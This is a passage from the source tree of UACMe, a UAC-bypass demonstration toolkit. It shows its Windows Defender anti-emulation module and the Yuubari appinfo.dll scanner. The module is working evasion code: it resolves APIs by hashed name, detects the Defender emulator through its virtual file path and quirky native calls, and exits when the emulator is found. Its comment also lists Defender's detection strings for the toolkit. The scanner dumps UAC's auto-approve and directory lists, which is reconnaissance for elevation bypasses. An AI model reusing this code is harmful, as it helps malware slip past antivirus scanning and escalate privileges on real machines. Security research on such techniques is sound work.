_In_ POPLOCK_FILE_CONTEXT ofc);
#ifdef _DEBUG
#define ucmDbgMsg(Message) OutputDebugString(Message)
#else
#define ucmDbgMsg(Message)
#endif
================================================
FILE: Source/Shared/windefend.c
================================================
/*******************************************************************************
*
* (C) COPYRIGHT AUTHORS, 2015 - 2026
*
* TITLE: WINDEFEND.C
*
* VERSION: 3.69
*
* DATE: 12 Feb 2026
*
* MSE / Windows Defender anti-emulation part.
*
* WARNING: Kernel32/ntdll only dependencies.
*
* Short FAQ:
*
* Q: Why this module included in UACMe,
* I thought this is demonstrator tool not real malware?
*
* A: WinDefender is a default AV software installed on every Windows
* since Windows 8. Because some of the lazy malware authors copy-pasted
* whole UACMe project in their crappiest malware WinDefender has
* several signatures to detect UACMe and it components.
* Example of WinDefend signature: Bampeass. We cannot be prevented by this
* as this demonstrator must be running on newest Windows OS versions.
*
* THIS CODE AND INFORMATION IS PROVIDED "AS IS" WITHOUT WARRANTY OF
* ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED
* TO THE IMPLIED WARRANTIES OF MERCHANTABILITY AND/OR FITNESS FOR A
* PARTICULAR PURPOSE.
*
*******************************************************************************/
#include "shared.h"
#pragma warning(push)
#pragma warning(disable: 4055)
#pragma warning(disable: 4152)
/*
WD Signatures
Trojan:Win64/Bampeass.A
Triggers:
[ U C M ] W u s a f a i l e d c o p y H i b i k i
% t e m p % \ H i b i k i . d l l
E l e v a t i o n : A d m i n i s t r a t o r ! n e w : { 4 D 1 1 1 E 0 8 - C B F 7 - 4 f 1 2 - A 9 2 6 - 2 C 7 9 2 0 A F 5 2 F C }
U A C M e i n j e c t e d , F u b u k i a t y o u r s e r v i c e
Trojan:Win64/Bampeass.B
Triggers:
UACMe injected, Hibiki at your service.
ucmLoadCallback, dll load %ws, DllBase = %
Trojan:Win64/Bampeass.C
Triggers:
ucmLoadCallback, dll load %ws, DllBase = %p
UACMe injected, Hibiki at your service.
ucmLoadCallback, kernel32 base found
HackTool:Win64/UACMe.A!MSR
Triggers:
\REGISTRY\MACHINE\SOFTWARE\Microsoft\WindowsNT\CurrentVersion\UAC\COMAutoApprovalList
run /tn "\Microsoft\Windows\DiskCleanup\SilentCleanup" /i
"UACMe main module
UAC is now disabled.\nYou must reboot your computer for the changes to take effect.
_FubukiProc4
UACMe v3.1.9.1905
\Software\KureND
ArisuTsuberuku
AkagiCompletionEvent
AkagiSharedSection
HackTool:Win32/Fubuki!MTB
Triggers:
AkagiSharedSection
system32\
_FubukiProc2
mmc.exe
\?\globalroot\systemroot\system32\sysprep\unbcl
CorBindToRuntimeEx
CreateUri
*/
DWORD wdxEmulatorAPIHashTable[] = {
0x70CE7692,
0xD4CE4554,
0x7A99CFAE
};
PVOID wdxGetProcedureAddressByHash(
_In_ PVOID ImageBase,
_In_ DWORD ProcedureHash);
/*
* wdxGetHashForString
*
* Purpose:
*
* Calculates specific hash for string.
*
*/
DWORD wdxGetHashForString(
_In_ char *s
)
{
DWORD h = 0;
while (*s != 0) {
h ^= *s;
h = RotateLeft32(h, 3) + 1;
s++;
}
return h;
}
/*
* wdxGetProcedureAddressByHash
*
* Purpose:
*
* Return pointer to function in MpClient from name hash value.
*
*/
PVOID wdxGetProcedureAddressByHash(
_In_ PVOID ImageBase,
_In_ DWORD ProcedureHash
)
{
DWORD i;
ULONG sz = 0;
IMAGE_DOS_HEADER *DosHeader;
IMAGE_EXPORT_DIRECTORY *Exports;
PDWORD Names, Functions;
PWORD Ordinals;
DWORD_PTR FunctionPtr;
if (ImageBase == NULL)
return NULL;
DosHeader = (IMAGE_DOS_HEADER*)ImageBase;
if (DosHeader->e_magic != IMAGE_DOS_SIGNATURE)
return NULL;
Exports = (IMAGE_EXPORT_DIRECTORY*)RtlImageDirectoryEntryToData(ImageBase,
TRUE,
IMAGE_DIRECTORY_ENTRY_EXPORT,
&sz);
if (Exports == NULL)
return NULL;
Names = (PDWORD)((PBYTE)DosHeader + Exports->AddressOfNames);
Ordinals = (PWORD)((PBYTE)DosHeader + Exports->AddressOfNameOrdinals);
Functions = (PDWORD)((PBYTE)DosHeader + Exports->AddressOfFunctions);
for (i = 0; i < Exports->NumberOfNames; i++) {
if (wdxGetHashForString((char *)((PBYTE)DosHeader + Names[i])) == ProcedureHash) {
FunctionPtr = Functions[Ordinals[i]];
return (PBYTE)ImageBase + FunctionPtr;
}
}
return NULL;
}
/*
* wdCheckEmulatedVFS
*
* Purpose:
*
* Detect Microsoft Security Engine emulation by it own VFS artefact.
*
* Microsoft AV provides special emulated environment for scanned application where it
* fakes general system information, process environment structures/data to make sure
* API calls are transparent for scanned code. It also use simple Virtual File System
* allowing this AV track file system changes and if needed continue emulation on new target.
*
* This method implemented in commercial malware presumable since 2013.
*
*/
VOID wdCheckEmulatedVFS(
VOID
)
{
WCHAR szBuffer[MAX_PATH];
WCHAR szMsEngVFS[12] = { L':', L'\\', L'm', L'y', L'a', L'p', L'p', L'.', L'e', L'x', L'e', 0 };
RtlSecureZeroMemory(&szBuffer, sizeof(szBuffer));
if (GetModuleFileName(NULL, szBuffer, MAX_PATH)) {
if (_strstri(szBuffer, szMsEngVFS) != NULL) {
RtlExitUserProcess((UINT)0);
}
}
}
/*
* wdIsEmulatorPresent
*
* Purpose:
*
* Detect MS emulator state.
*
*/
NTSTATUS wdIsEmulatorPresent(
VOID)
{
PCHAR ImageBase = NULL;
IMAGE_DOS_HEADER *DosHeader;
IMAGE_EXPORT_DIRECTORY *Exports;
PDWORD Names;
ULONG i, c, Hash, sz = 0;
UNICODE_STRING usNtdll = RTL_CONSTANT_STRING(L"ntdll.dll");
if (!NT_SUCCESS(LdrGetDllHandleEx(LDR_GET_DLL_HANDLE_EX_UNCHANGED_REFCOUNT,
NULL, NULL, &usNtdll, &ImageBase)))
{
return STATUS_DLL_NOT_FOUND;
}
if (ImageBase == NULL)
return STATUS_DLL_NOT_FOUND;
Exports = (IMAGE_EXPORT_DIRECTORY*)RtlImageDirectoryEntryToData(ImageBase, TRUE,
IMAGE_DIRECTORY_ENTRY_EXPORT, &sz);
if (Exports == NULL)
return STATUS_INVALID_IMAGE_FORMAT;
DosHeader = (IMAGE_DOS_HEADER*)ImageBase;
Names = (PDWORD)((PBYTE)DosHeader + Exports->AddressOfNames);
for (i = 0; i < Exports->NumberOfNames; i++) {
Hash = wdxGetHashForString((char *)((PBYTE)DosHeader + Names[i]));
for (c = 0; c < RTL_NUMBER_OF(wdxEmulatorAPIHashTable); c++) {
if (Hash == wdxEmulatorAPIHashTable[c])
return STATUS_NEEDS_REMEDIATION;
}
}
return STATUS_NOT_SUPPORTED;
}
/*
* wdIsEmulatorPresent2
*
* Purpose:
*
* Detect MS emulator state 2.
*
* Microsoft AV defines virtual environment dlls loaded in runtime from VDM files.
* These fake libraries implement additional detection layer and come with a lot of
* predefined values.
*
*/
BOOLEAN wdIsEmulatorPresent2(
VOID)
{
return NtIsProcessInJob(NtCurrentProcess(), UlongToHandle(10)) == 0x125;
}
/*
* wdIsEmulatorPresent3
*
* Purpose:
*
* Same as previous.
*
*/
BOOLEAN wdIsEmulatorPresent3(
VOID)
{
if (NT_SUCCESS(NtCompressKey(UlongToHandle(0xFFFF1234))))
return TRUE;
return FALSE;
}
#pragma warning(pop)
================================================
FILE: Source/Shared/windefend.h
================================================
/*******************************************************************************
*
* (C) COPYRIGHT AUTHORS, 2015 - 2020
*
* TITLE: WINDEFEND.H
*
* VERSION: 3.50
*
* DATE: 05 Oct 2020
*
* MSE / Windows Defender anti-emulation part header file.
*
* THIS CODE AND INFORMATION IS PROVIDED "AS IS" WITHOUT WARRANTY OF
* ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED
* TO THE IMPLIED WARRANTIES OF MERCHANTABILITY AND/OR FITNESS FOR A
* PARTICULAR PURPOSE.
*
*******************************************************************************/
#pragma once
VOID wdCheckEmulatedVFS(
VOID);
NTSTATUS wdIsEmulatorPresent(
VOID);
BOOLEAN wdIsEmulatorPresent2(
VOID);
BOOLEAN wdIsEmulatorPresent3(
VOID);
================================================
FILE: Source/Yuubari/Yuubari.vcxproj
================================================
Debug
x64
ReleaseInternal
x64
Release
x64
{304D5A8A-EF98-4E21-8F4D-91E66E0BECAC}
Win32Proj
Yuubari
10.0
Application
true
v145
Unicode
false
Application
false
v145
true
Unicode
false
Application
false
v145
true
Unicode
false
true
.\output\$(Platform)\$(Configuration)\
.\output\$(Platform)\$(Configuration)\
AllRules.ruleset
false
.\output\$(Platform)\$(Configuration)\
.\output\$(Platform)\$(Configuration)\
UacInfo64
AllRules.ruleset
false
false
.\output\$(Platform)\$(Configuration)\
.\output\$(Platform)\$(Configuration)\
UacInfo64
SecurityRules.ruleset
true
Level4
Disabled
_DEBUG;_WINDOWS;%(PreprocessorDefinitions)
true
CompileAsC
$(ProjectDir);$(SolutionDir)
Console
true
main
6.0
Level4
MaxSpeed
true
true
NDEBUG;_WINDOWS;%(PreprocessorDefinitions)
true
CompileAsC
MultiThreaded
Guard
true
$(ProjectDir);$(SolutionDir)
false
true
Console
true
true
false
main
true
6.0
/NOCOFFGRPINFO %(AdditionalOptions)
Level4
MinSpace
true
true
NDEBUG;_WINDOWS;%(PreprocessorDefinitions)
true
CompileAsC
MultiThreaded
Guard
true
$(ProjectDir);$(SolutionDir)
true
true
Size
Console
true
true
false
main
true
6.0
/NOCOFFGRPINFO %(AdditionalOptions)
\Utils\StripDebug.exe .\output\$(Platform)\$(Configuration)\UacInfo64.exe
================================================
FILE: Source/Yuubari/Yuubari.vcxproj.filters
================================================
{4FC737F1-C7A5-4376-A066-2A32D752A2FF}
cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx
{93995380-89BD-4b04-88EB-625FBE52EBFB}
h;hh;hpp;hxx;hm;inl;inc;xsd
{67DA6AB6-F800-4c08-8B7A-83BB121AAD01}
rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms
{336547cc-9eeb-4b6e-affd-aa70e6f7bfba}
{c345b77b-4418-4498-8377-bcbbbc11aa76}
{feac226e-813e-438e-a68d-49e68ad8f8bb}
Source Files
Source Files
minirtl
minirtl
minirtl
minirtl
Source Files
Source Files
minirtl
minirtl
minirtl
minirtl
Source Files
Source Files
Source Files
minirtl
minirtl
Source Files
testunits
minirtl
hde
minirtl
minirtl
Header Files
Header Files
Header Files
Header Files
Header Files
Header Files
Header Files
Header Files
Header Files
Header Files
minirtl
Header Files
Header Files
testunits
Header Files
minirtl
hde
hde
hde
Resource Files
Resource Files
================================================
FILE: Source/Yuubari/Yuubari.vcxproj.user
================================================
WindowsLocalDebugger
WindowsLocalDebugger
WindowsLocalDebugger
================================================
FILE: Source/Yuubari/appinfo.c
================================================
/*******************************************************************************
*
* (C) COPYRIGHT AUTHORS, 2014 - 2025
*
* TITLE: APPINFO.C
*
* VERSION: 1.60
*
* DATE: 17 Jun 2025
*
* THIS CODE AND INFORMATION IS PROVIDED "AS IS" WITHOUT WARRANTY OF
* ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED
* TO THE IMPLIED WARRANTIES OF MERCHANTABILITY AND/OR FITNESS FOR A
* PARTICULAR PURPOSE.
*
*******************************************************************************/
#include "global.h"
#pragma comment(lib, "version.lib")
#define DEFAULT_SYMPATH L"*https://msdl.microsoft.com/download/symbols"
#define TEXT_SECTION ".text"
#define TEXT_SECTION_LEGNTH sizeof(TEXT_SECTION)
#define RDATA_SECTION ".rdata"
#define RDATA_SECTION_LENGTH sizeof(RDATA_SECTION)
#define TestChar(x) (((WCHAR)x >= L'A') && ((WCHAR)x <= L'z'))
/*
* GetAppInfoBuildVersion
*
* Purpose:
*
* Return build number of AppInfo.
*
*/
BOOL GetAppInfoBuildVersion(
_In_ LPWSTR lpFileName,
_Out_ ULONG* BuildNumber
)
{
BOOL bResult = FALSE;
DWORD dwHandle, dwSize;
PVOID vinfo = NULL;
UINT Length;
VS_FIXEDFILEINFO* pFileInfo;
*BuildNumber = 0;
dwHandle = 0;
dwSize = GetFileVersionInfoSize(lpFileName, &dwHandle);
if (dwSize) {
vinfo = supHeapAlloc(dwSize);
if (vinfo) {
if (GetFileVersionInfo(lpFileName, 0, dwSize, vinfo)) {
bResult = VerQueryValue(vinfo, TEXT("\\"), (LPVOID*)&pFileInfo, (PUINT)&Length);
if (bResult) {
*BuildNumber = HIWORD(pFileInfo->dwFileVersionLS);
}
}
supHeapFree(vinfo);
}
}
return bResult;
}
/*
* LookupAddressBySymbol
*
* Purpose:
*
* Return address of symbol by name.
*
*/
ULONG64 LookupAddressBySymbol(
_In_ pfnSymFromNameW SymFromName,
_In_ LPCWSTR SymbolName,
_Out_opt_ PBOOL Status
)
{
BOOL bStatus = FALSE;
SIZE_T symSize;
ULONG64 symAddress = 0;
PSYMBOL_INFOW symbolInfo = NULL;
symSize = sizeof(SYMBOL_INFOW);
symbolInfo = (PSYMBOL_INFOW)supHeapAlloc(symSize);
if (symbolInfo) {
symbolInfo->SizeOfStruct = sizeof(SYMBOL_INFOW);
symbolInfo->MaxNameLen = 0; //name is not used
bStatus = SymFromName(
GetCurrentProcess(),
SymbolName,
symbolInfo);
if (bStatus)
symAddress = symbolInfo->Address;
supHeapFree(symbolInfo);
}
if (Status)
*Status = bStatus;
return symAddress;
}
/*
* ResolveAppInfoSymbols
*
* Purpose:
*
* Load dbghelp, resolve appinfo pointers through symbols lookup.
*
*/
BOOL ResolveAppInfoSymbols(
_In_ PUAC_AI_GLOBALS AppInfo
)
{
SIZE_T dirLength;
WCHAR szBuffer[MAX_PATH * 2];
WCHAR szUserSearchPath[MAX_PATH * 2];
HANDLE dllHandle;
HANDLE processHandle = GetCurrentProcess();
DWORD64 baseOfDll;
pfnSymInitializeW pSymInitialize;
pfnSymSetOptions pSymSetOptions;
pfnSymLoadModuleExW pSymLoadModuleEx;
pfnSymFromNameW pSymFromName;
pfnSymUnloadModule64 pSymUnloadModule64;
pfnSymCleanup pSymCleanup;
RtlSecureZeroMemory(szBuffer, sizeof(szBuffer));
if (GetModuleFileName(NULL, szBuffer, MAX_PATH) == 0)
return FALSE;
_filepath(szBuffer, szBuffer);
_strcat(szBuffer, TEXT("symdll\\"));
dirLength = _strlen(szBuffer);
_strcat(szBuffer, TEXT("dbghelp.dll"));
dllHandle = LoadLibrary(szBuffer);
if (dllHandle == NULL)
return FALSE;
/*szBuffer[dirLength] = 0;
_strcat(szBuffer, TEXT("symsrv.dll"));
LoadLibrary(szBuffer);*/
pSymInitialize = (pfnSymInitializeW)GetProcAddress(dllHandle, "SymInitializeW");
if (pSymInitialize == NULL)
return FALSE;
pSymSetOptions = (pfnSymSetOptions)GetProcAddress(dllHandle, "SymSetOptions");
if (pSymSetOptions == NULL)
return FALSE;
pSymLoadModuleEx = (pfnSymLoadModuleExW)GetProcAddress(dllHandle, "SymLoadModuleExW");
if (pSymLoadModuleEx == NULL)
return FALSE;
pSymFromName = (pfnSymFromNameW)GetProcAddress(dllHandle, "SymFromNameW");
if (pSymFromName == NULL)
return FALSE;
pSymUnloadModule64 = (pfnSymUnloadModule64)GetProcAddress(dllHandle, "SymUnloadModule64");
if (pSymUnloadModule64 == NULL)
return FALSE;
pSymCleanup = (pfnSymCleanup)GetProcAddress(dllHandle, "SymCleanup");
if (pSymCleanup == NULL)
return FALSE;
pSymSetOptions(SYMOPT_DEFERRED_LOADS | SYMOPT_UNDNAME);
szBuffer[dirLength] = 0;
_strcat(szBuffer, TEXT("Symbols"));
if (!CreateDirectory((LPCWSTR)&szBuffer, NULL))
if (GetLastError() != ERROR_ALREADY_EXISTS)
return FALSE;
_strcpy(szUserSearchPath, TEXT("SRV*"));
_strcat(szUserSearchPath, szBuffer);
_strcat(szUserSearchPath, DEFAULT_SYMPATH);
processHandle = GetCurrentProcess();
if (pSymInitialize(processHandle, szUserSearchPath, FALSE)) {
baseOfDll = pSymLoadModuleEx(processHandle,
NULL,
TEXT("appinfo.dll"),
NULL,
(DWORD64)AppInfo->DllBase,
0,
NULL,
0);
if (baseOfDll) {
AppInfo->lpAutoApproveEXEList = (PVOID*)LookupAddressBySymbol(pSymFromName, TEXT("g_lpAutoApproveEXEList"), NULL);
AppInfo->lpIncludedPFDirs = (PVOID*)LookupAddressBySymbol(pSymFromName, TEXT("g_lpIncludedPFDirs"), NULL);
AppInfo->lpIncludedWindowsDirs = (PVOID*)LookupAddressBySymbol(pSymFromName, TEXT("g_lpIncludedWindowsDirs"), NULL);
AppInfo->lpIncludedSystemDirs = (PVOID*)LookupAddressBySymbol(pSymFromName, TEXT("g_lpIncludedSystemDirs"), NULL);
AppInfo->lpExemptedAutoApproveExes = (PVOID*)LookupAddressBySymbol(pSymFromName, TEXT("g_lpExemptedAutoApproveExes"), NULL);
AppInfo->lpExcludedWindowsDirs = (PVOID*)LookupAddressBySymbol(pSymFromName, TEXT("g_lpExcludedWindowsDirs"), NULL);
AppInfo->lpAutoApproveEXEList = (PVOID*)LookupAddressBySymbol(pSymFromName, TEXT("g_lpAutoApproveEXEList"), NULL);
pSymUnloadModule64(processHandle, baseOfDll);
pSymCleanup(processHandle);
return TRUE;
}
}
return FALSE;
}
PVOID AipFindMSBlockInSection(
_In_ PVOID DllBase,
_In_ IMAGE_SECTION_HEADER* SectionTableEntry,
_In_ ULONG_PTR PatternValue
)
{
PBYTE SectionBase;
ULONG SectionSize, Offset;
ULONG_PTR TestValue;
PVOID RefPointer = NULL, pvMmcBlock = NULL;
SectionBase = (PBYTE)RtlOffsetToPointer(DllBase, SectionTableEntry->VirtualAddress);
SectionSize = SectionTableEntry->Misc.VirtualSize;
for (Offset = 0; Offset < SectionSize - sizeof(ULONG_PTR); Offset++) {
RefPointer = SectionBase + Offset;
TestValue = *(PULONG_PTR)RefPointer;
if (TestValue == PatternValue) {
pvMmcBlock = (PVOID)RefPointer;
break;
}
}
return pvMmcBlock;
}
/*
* AipQueryMSBlock
*
* Purpose:
*
* Locate mmc block.
*
*/
BOOLEAN AipQueryMSBlock(
_In_ UAC_AI_GLOBALS* AppInfo
)
{
ULONG i;
ULONG SectionSize;
ULONG_PTR PatternValue = 0;
PVOID pvMmcBlock = NULL;
PBYTE SectionBase;
IMAGE_NT_HEADERS* NtHeaders = RtlImageNtHeader(AppInfo->DllBase);
IMAGE_SECTION_HEADER* SectionTableEntry, * RDataTableEntry = NULL;
WCHAR szSignature[] = L"mmc.exe";
SectionTableEntry = IMAGE_FIRST_SECTION(NtHeaders);
for (i = 0; i < NtHeaders->FileHeader.NumberOfSections; i++, SectionTableEntry++) {
SectionBase = (PBYTE)RtlOffsetToPointer(AppInfo->DllBase, SectionTableEntry->VirtualAddress);
SectionSize = SectionTableEntry->Misc.VirtualSize;
PatternValue = (ULONG_PTR)supFindPattern(SectionBase,
SectionSize,
(CONST PBYTE)szSignature,
sizeof(szSignature));
if (PatternValue)
break;
}
if (PatternValue == 0)
return FALSE;
SectionTableEntry = IMAGE_FIRST_SECTION(NtHeaders);
for (i = 0; i < NtHeaders->FileHeader.NumberOfSections; i++, SectionTableEntry++) {
if (_strncmp_a(
(CHAR*)SectionTableEntry->Name,
RDATA_SECTION,
RDATA_SECTION_LENGTH) == 0)
{
RDataTableEntry = SectionTableEntry;
break;
}
}
if (RDataTableEntry) {
pvMmcBlock = AipFindMSBlockInSection(AppInfo->DllBase,
RDataTableEntry,
PatternValue);
}
else {
SectionTableEntry = IMAGE_FIRST_SECTION(NtHeaders);
for (i = 0; i < NtHeaders->FileHeader.NumberOfSections; i++, SectionTableEntry++) {
pvMmcBlock = AipFindMSBlockInSection(AppInfo->DllBase,
SectionTableEntry,
PatternValue);
if (pvMmcBlock)
break;
}
}
if (pvMmcBlock) {
AppInfo->MmcBlock = pvMmcBlock;
return TRUE;
}
return FALSE;
}
BOOL IsCrossPtr(
_In_ UAC_AI_GLOBALS* AppInfo,
_In_ ULONG_PTR Ptr,
_In_ ULONG_PTR CurrentList
)
{
if (Ptr == 0 || AppInfo == NULL) {
return TRUE;
}
if (!IN_REGION(Ptr, AppInfo->DllBase, AppInfo->DllVirtualSize)) {
return TRUE;
}
if (AppInfo->lpAutoApproveEXEList) {
if (CurrentList != (ULONG_PTR)AppInfo->lpAutoApproveEXEList)
if ((ULONG_PTR)Ptr == (ULONG_PTR)AppInfo->lpAutoApproveEXEList[0])
return TRUE;
}
if (AppInfo->lpExcludedWindowsDirs) {
if (CurrentList != (ULONG_PTR)AppInfo->lpExcludedWindowsDirs)
if ((ULONG_PTR)Ptr == (ULONG_PTR)AppInfo->lpExcludedWindowsDirs[0])
return TRUE;
}
if (AppInfo->lpExemptedAutoApproveExes) {
if (CurrentList != (ULONG_PTR)AppInfo->lpExemptedAutoApproveExes)
if ((ULONG_PTR)Ptr == (ULONG_PTR)AppInfo->lpExemptedAutoApproveExes[0])
return TRUE;
}
if (AppInfo->lpIncludedPFDirs) {
if (CurrentList != (ULONG_PTR)AppInfo->lpIncludedPFDirs)
if ((ULONG_PTR)Ptr == (ULONG_PTR)AppInfo->lpIncludedPFDirs[0])
return TRUE;
}
if (AppInfo->lpIncludedSystemDirs) {
if (CurrentList != (ULONG_PTR)AppInfo->lpIncludedSystemDirs)
if ((ULONG_PTR)Ptr == (ULONG_PTR)AppInfo->lpIncludedSystemDirs[0])
return TRUE;
}
if (AppInfo->lpIncludedWindowsDirs) {
if (CurrentList != (ULONG_PTR)AppInfo->lpIncludedWindowsDirs)
if ((ULONG_PTR)Ptr == (ULONG_PTR)AppInfo->lpIncludedWindowsDirs[0])
return TRUE;
}
return FALSE;
}
/*
* ListMMCFiles
*
* Purpose:
*
* Output MMC related block from appinfo.dll.
*
*/
VOID ListMMCFiles(
_In_ UAC_AI_GLOBALS* AppInfo,
_In_ OUTPUTCALLBACK OutputCallback
)
{
SIZE_T i, Length;
LPWSTR TestString = NULL;
PVOID* MscArray = NULL;
UAC_AI_DATA CallbackData;
if (!AipQueryMSBlock(AppInfo))
return;
__try {
if (AppInfo->MmcBlock->NumOfElements == 0 ||
AppInfo->MmcBlock->NumOfElements > 256) {
OutputDebugString(TEXT("Invalid block data"));
}
else {
CallbackData.Type = AiManagementConsole;
TestString = AppInfo->MmcBlock->lpManagementApplication;
if (TestString) {
if (IN_REGION(TestString, AppInfo->DllBase, AppInfo->DllVirtualSize)) {
CallbackData.Name = TestString;
CallbackData.Length = _strlen(TestString);
OutputCallback((PVOID)&CallbackData);
}
}
CallbackData.Type = AiSnapinFile;
MscArray = (PVOID*)AppInfo->MmcBlock->Base;
for (i = 0; i < AppInfo->MmcBlock->NumOfElements; i++) {
TestString = (LPWSTR)MscArray[i];
if (TestString != NULL) {
if (IN_REGION(TestString, AppInfo->DllBase, AppInfo->DllVirtualSize)) {
Length = _strlen(TestString);
CallbackData.Name = TestString;
CallbackData.Length = Length;
OutputCallback((PVOID)&CallbackData);
}
}
}
}
}
__except (EXCEPTION_EXECUTE_HANDLER) {
OutputDebugString(TEXT("Invalid block"));
return;
}
}
/*
* ListAutoApproveEXE
*
* Purpose:
*
* Output lpAutoApproveEXE list from appinfo.dll.
*
*/
VOID ListAutoApproveEXE(
_In_ UAC_AI_GLOBALS* AppInfo,
_In_ OUTPUTCALLBACK OutputCallback
)
{
BOOL bValidEntry;
WCHAR k, lk;
SIZE_T i, Length = 0;
LPWSTR TestString = NULL;
UAC_AI_DATA CallbackData;
SIZE_T MaxEntries = 100;
if (AppInfo->lpAutoApproveEXEList == NULL)
return;
CallbackData.Type = AiAutoApproveEXE;
i = 0;
k = 0;
lk = 0;
__try {
do {
if (i >= MaxEntries)
break;
TestString = (LPWSTR)AppInfo->lpAutoApproveEXEList[i];
if (IsCrossPtr(AppInfo, (ULONG_PTR)TestString, (ULONG_PTR)AppInfo->lpAutoApproveEXEList))
break;
if (!IN_REGION(TestString, AppInfo->DllBase, AppInfo->DllVirtualSize))
break;
bValidEntry = FALSE;
__try {
k = TestString[0];
bValidEntry = TestChar(k);
}
__except (EXCEPTION_EXECUTE_HANDLER) {
break;
}
if (!bValidEntry)
break;
if (k < lk)
break;
lk = k;
i += 1;
__try {
Length = _strlen(TestString);
if (Length > MAX_PATH * 2) {
continue;
}
}
__except (EXCEPTION_EXECUTE_HANDLER) {
continue;
}
Length = _strlen(TestString);
CallbackData.Length = Length;
CallbackData.Name = TestString;
OutputCallback((PVOID)&CallbackData);
} while (1);
}
__except (EXCEPTION_EXECUTE_HANDLER) {
OutputDebugString(TEXT("Invalid pointer, enum stop"));
return;
}
}
/*
* ListStringDataUnsorted
*
* Purpose:
*
* Output unsorted string data from appinfo.dll.
*
*/
VOID ListStringDataUnsorted(
UAC_AI_GLOBALS* AppInfo,
AI_DATA_TYPE AiDataType,
PVOID* Data,
OUTPUTCALLBACK OutputCallback
)
{
BOOL bValidEntry = FALSE;
SIZE_T i, Length = 0, MaxEntries = 100;
LPWSTR TestString = NULL;
UAC_AI_DATA CallbackData;
if (Data == NULL)
return;
CallbackData.Type = AiDataType;
i = 0;
__try {
do {
if (i >= MaxEntries)
break;
TestString = (LPWSTR)Data[i];
if (IsCrossPtr(AppInfo, (ULONG_PTR)TestString, (ULONG_PTR)Data))
break;
if (!IN_REGION(TestString, AppInfo->DllBase, AppInfo->DllVirtualSize))
break;
bValidEntry = FALSE;
__try {
bValidEntry = TestChar(TestString[0]);
}
__except (EXCEPTION_EXECUTE_HANDLER) {
break;
}
if (!bValidEntry)
break;
i += 1;
__try {
Length = _strlen(TestString);
if (Length > MAX_PATH * 2) {
continue;
}
}
__except (EXCEPTION_EXECUTE_HANDLER) {
continue;
}
Length = _strlen(TestString);
CallbackData.Length = Length;
CallbackData.Name = TestString;
OutputCallback((PVOID)&CallbackData);
} while (1);
}
__except (EXCEPTION_EXECUTE_HANDLER) {
OutputDebugString(TEXT("Invalid pointer, enum stop"));
return;
}
}
/*
* ScanAppInfo
*
* Purpose:
*
* Map appinfo.dll and extract various information from it.
*
*/
VOID ScanAppInfo(
LPWSTR lpFileName,
OUTPUTCALLBACK OutputCallback
)
{
NTSTATUS status;
HANDLE hFile = NULL, hSection = NULL;
PBYTE DllBase = NULL;
SIZE_T DllVirtualSize;
OBJECT_ATTRIBUTES attr;
UNICODE_STRING usFileName;
IO_STATUS_BLOCK iosb;
UAC_AI_GLOBALS AppInfo;
RtlSecureZeroMemory(&AppInfo, sizeof(AppInfo));
RtlInitEmptyUnicodeString(&usFileName, NULL, 0);
do {
//
// Due to brilliant MS design all newest versions has the same build in file version attributes.
//
if (g_NtBuildNumber >= NT_WIN10_19H1) {
AppInfo.AppInfoBuildNumber = g_NtBuildNumber;
}
else {
if (!GetAppInfoBuildVersion(lpFileName, &AppInfo.AppInfoBuildNumber))
break;
}
if (RtlDosPathNameToNtPathName_U(lpFileName, &usFileName, NULL, NULL) == FALSE)
break;
InitializeObjectAttributes(&attr, &usFileName, OBJ_CASE_INSENSITIVE, NULL, NULL);
RtlSecureZeroMemory(&iosb, sizeof(iosb));
status = NtCreateFile(&hFile,
SYNCHRONIZE | FILE_READ_DATA,
&attr,
&iosb,
NULL,
0,
FILE_SHARE_READ,
FILE_OPEN,
FILE_SYNCHRONOUS_IO_NONALERT,
NULL,
0);
if (!NT_SUCCESS(status))
break;
status = NtCreateSection(&hSection,
SECTION_ALL_ACCESS,
NULL,
NULL,
PAGE_READONLY,
SEC_IMAGE,
hFile);
if (!NT_SUCCESS(status))
break;
DllBase = NULL;
DllVirtualSize = 0;
status = NtMapViewOfSection(hSection,
NtCurrentProcess(),
(PVOID*)&DllBase,
0,
0,
NULL,
&DllVirtualSize,
ViewUnmap,
0,
PAGE_READONLY);
if (!NT_SUCCESS(status))
break;
AppInfo.DllBase = DllBase;
AppInfo.DllVirtualSize = DllVirtualSize;
ListMMCFiles(&AppInfo, OutputCallback);
if (ResolveAppInfoSymbols(&AppInfo)) {
ListAutoApproveEXE(&AppInfo, OutputCallback);
ListStringDataUnsorted(&AppInfo, AiIncludedPFDirs, AppInfo.lpIncludedPFDirs, OutputCallback);
ListStringDataUnsorted(&AppInfo, AilpIncludedWindowsDirs, AppInfo.lpIncludedWindowsDirs, OutputCallback);
ListStringDataUnsorted(&AppInfo, AiIncludedSystemDirs, AppInfo.lpIncludedSystemDirs, OutputCallback);
ListStringDataUnsorted(&AppInfo, AiExemptedAutoApproveExes, AppInfo.lpExemptedAutoApproveExes, OutputCallback);
ListStringDataUnsorted(&AppInfo, AiExcludedWindowsDirs, AppInfo.lpExcludedWindowsDirs, OutputCallback);
}
} while (FALSE);
if (usFileName.Buffer != NULL)
RtlFreeUnicodeString(&usFileName);
if (DllBase != NULL)
NtUnmapViewOfSection(NtCurrentProcess(), DllBase);
if (hSection != NULL)
NtClose(hSection);
if (hFile != NULL)
NtClose(hFile);
}
================================================
FILE: Source/Yuubari/appinfo.h
================================================
#/*******************************************************************************
*
* (C) COPYRIGHT AUTHORS, 2014 - 2022
*
* TITLE: APPINFO.H
*
* VERSION: 1.54
*
* DATE: 01 Dec 2022
*
* Header file for the AppInfo scan.
*
* THIS CODE AND INFORMATION IS PROVIDED "AS IS" WITHOUT WARRANTY OF
* ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED
* TO THE IMPLIED WARRANTIES OF MERCHANTABILITY AND/OR FITNESS FOR A
* PARTICULAR PURPOSE.
*
*******************************************************************************/
#pragma once
#include
typedef enum _AI_DATA_TYPE {
AiSnapinFile = 1,
AiManagementConsole,
AiAutoApproveEXE,
AiIncludedPFDirs,
AiIncludedSystemDirs,
AilpIncludedWindowsDirs,
AiExemptedAutoApproveExes,
AiExcludedWindowsDirs,
AiMax
